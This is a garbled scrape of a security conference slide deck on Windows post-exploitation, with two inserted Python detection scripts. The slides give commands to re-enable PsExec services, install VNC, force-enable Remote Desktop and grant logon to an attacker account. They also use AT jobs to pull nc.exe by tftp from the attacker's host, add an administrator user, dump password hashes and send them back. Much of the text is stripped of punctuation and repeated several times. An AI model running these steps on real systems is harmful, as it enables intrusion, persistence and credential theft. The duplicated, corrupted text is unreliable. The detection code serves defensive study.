– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /Force
• net start "terminal services"
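The two files on slides 53 and 54 are exactly what a defender wants to recognise when they appear on a host: a .reg export that flips the Terminal Server switches, and a secedit template that empties the deny-logon rights and hands interactive logon to one account. The block below is an added example, not the presenters' tooling, that parses both formats and reports those settings. The file contents are constructed copies of the slide fragments, and allowed_rdp_accounts is an assumed parameter standing in for whatever accounts a site legitimately grants Remote Desktop to.

```python
"""Audit the Terminal Server .reg fragment and the secedit policy template.

Added example (not the talk's code). Parses a Windows .reg export and a
secedit .inf/.ini template and flags the changes the slides describe:
Remote Desktop switched on, deny-logon rights cleared, and logon rights
granted to accounts outside an allow-list.
"""
import re

# Constructed copy of the enable_ts.reg fragment shown on slide 54.
ENABLE_TS_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

# Constructed copy of the fix_ts_policy.ini template shown on slide 53.
FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

TS_KEY = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server'
REG_DWORD = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{8})$')
# Rights that, when emptied, remove a "deny" restriction.
DENY_RIGHTS = ('sedenyinteractivelogonright',
               'sedenyremoteinteractivelogonright',
               'sedenynetworklogonright')
# Rights that grant interactive or RDP logon to the listed accounts.
GRANT_RIGHTS = ('seremoteinteractivelogonright', 'seinteractivelogonright')


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg export."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            result.setdefault(current, {})
        elif current and (m := REG_DWORD.match(line)):
            result[current][m.group('name')] = int(m.group('val'), 16)
    return result


def parse_privilege_rights(text):
    """Return {right_name_lowercase: [accounts]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('['):
            in_section = line.lower() == '[privilege rights]'
            continue
        if in_section and '=' in line:
            name, _, accounts = line.partition('=')
            rights[name.strip().lower()] = [a.strip() for a in accounts.split(',') if a.strip()]
    return rights


def audit(reg_text, ini_text, allowed_rdp_accounts=()):
    """Return human-readable findings for the settings the slides change."""
    findings = []
    values = parse_reg(reg_text).get(TS_KEY, {})
    if values.get('fDenyTSConnections') == 0:
        findings.append('fDenyTSConnections=0: Remote Desktop connections enabled')
    if values.get('TSEnabled') == 1:
        findings.append('TSEnabled=1: Terminal Server enabled')

    rights = parse_privilege_rights(ini_text)
    for right in DENY_RIGHTS:
        if right in rights and not rights[right]:
            findings.append(f'{right} cleared: deny-logon restriction removed')
    allowed = {a.lower() for a in allowed_rdp_accounts}
    for right in GRANT_RIGHTS:
        for account in rights.get(right, []):
            if account.lower() not in allowed:
                findings.append(f'{right} granted to unexpected account {account}')
    return findings


if __name__ == '__main__':
    for finding in audit(ENABLE_TS_REG, FIX_TS_POLICY_INI):
        print(finding)
```

Run against the slide fragments the audit reports seven findings: both Terminal Server switches, the three cleared deny rights, and the two grants to hacked_account. Passing that account in allowed_rdp_accounts drops the last two, which is how a site would suppress its own approved RDP users.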
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Old-school techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– ClipBook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm "tftp -i myip GET nc.exe"
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable/start services
– Transfer files
– Adding users
– Messing with the registry/policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – flow
• Establish an authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time + 1 min) "tftp -i use GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hash-dumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
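Every step of the PsExec, Remote Desktop and AT procedures on slides 50 through 61 leaves a command line behind: a remote sc reconfiguration of a service that is normally off, a remote at job, a secedit policy rewrite, a net user /add followed by net localgroup administrators /add, and a binary-mode tftp fetch. The block below is an added example, not the presenters' tooling, that runs a small rule set over process-creation records and reports which of those patterns each one matches. The records are constructed in the style of Sysmon event 1 fields (Image, CommandLine, User); the field names, the rule names and the WATCHED_SERVICES set are assumptions for the example.

```python
"""Flag the command lines the scheduler and feature-modification slides rely on.

Added example (not the talk's code). Each rule is a regex over a
process-creation command line; classify() returns the rule names that
match one record and scan() runs the rule set over a list of records.
"""
import re

# Services the slides re-enable: ClipBook/NetDDE for PsExec, Schedule for AT,
# TermService for Remote Desktop. Reconfiguring other services is not flagged.
WATCHED_SERVICES = {'netdde', 'netddedsdm', 'clipsrv', 'schedule', 'termservice'}

RULES = [
    # sc \\host config <svc> start= auto  /  sc \\host start <svc>
    ('remote-service-reconfig',
     re.compile(r'\bsc(?:\.exe)?\s+\\\\\S+\s+(?:config|start)\s+(?P<svc>\S+)', re.I)),
    # at \\host 12:00pm "<command>"
    ('remote-at-job',
     re.compile(r'\bat(?:\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}', re.I)),
    # secedit /configure /db ... /cfg ...
    ('secedit-policy-rewrite',
     re.compile(r'\bsecedit(?:\.exe)?\s+/configure\b', re.I)),
    # net user <name> <password> /add
    ('local-user-add',
     re.compile(r'\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b', re.I)),
    # net localgroup administrators <name> /add
    ('admin-group-add',
     re.compile(r'\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b', re.I)),
    # tftp -i <host> GET <file>  (binary-mode fetch of a tool)
    ('tftp-binary-transfer',
     re.compile(r'\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b', re.I)),
]


def classify(event):
    """Return the rule names matching one process-creation record."""
    cmd = event.get('CommandLine', '')
    hits = []
    for name, rx in RULES:
        m = rx.search(cmd)
        if m is None:
            continue
        # Only the services the slides care about count as a reconfiguration hit.
        if name == 'remote-service-reconfig' and m.group('svc').lower() not in WATCHED_SERVICES:
            continue
        hits.append(name)
    return hits


def scan(events):
    """Return [(record index, user, rule name), ...] for every hit."""
    return [(i, ev.get('User', '?'), rule)
            for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed records; the command lines mirror the ones on the slides.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\sc.exe', 'User': r'CORP\jsmith',
     'CommandLine': r'sc \\srv01 config clipsrv start= auto'},
    {'Image': r'C:\Windows\System32\sc.exe', 'User': r'CORP\jsmith',
     'CommandLine': r'sc \\srv01 config wuauserv start= auto'},   # not a watched service
    {'Image': r'C:\Windows\System32\at.exe', 'User': r'CORP\jsmith',
     'CommandLine': r'at \\192.168.1.1 12:00pm "tftp -i 192.168.1.50 GET nc.exe"'},
    {'Image': r'C:\Windows\System32\secedit.exe', 'User': r'NT AUTHORITY\SYSTEM',
     'CommandLine': r'secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini'},
    {'Image': r'C:\Windows\System32\net.exe', 'User': r'NT AUTHORITY\SYSTEM',
     'CommandLine': r'net user hacked hacked /add'},
    {'Image': r'C:\Windows\System32\net.exe', 'User': r'NT AUTHORITY\SYSTEM',
     'CommandLine': r'net localgroup administrators hacked /add'},
    {'Image': r'C:\Windows\System32\sc.exe', 'User': r'CORP\jsmith',
     'CommandLine': r'sc query'},                                    # benign
]

if __name__ == '__main__':
    for i, user, rule in scan(SAMPLE_EVENTS):
        print(f'record {i} ({user}): {rule} :: {SAMPLE_EVENTS[i]["CommandLine"]}')
```

The at record produces two hits, one for the remote job itself and one for the tftp fetch carried in its argument, which is the pairing slide 58 shows. The secedit, net user and net localgroup records are tagged with the SYSTEM user in the sample because slide 59 notes that AT jobs default to running as SYSTEM; a real detection would correlate those SYSTEM-context commands with the preceding remote at job from the same source.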
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use/re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – establish NetBIOS session credentials on a range of hosts
• MassWinenum – enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – the theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to:
• All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
• HD Moore, especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
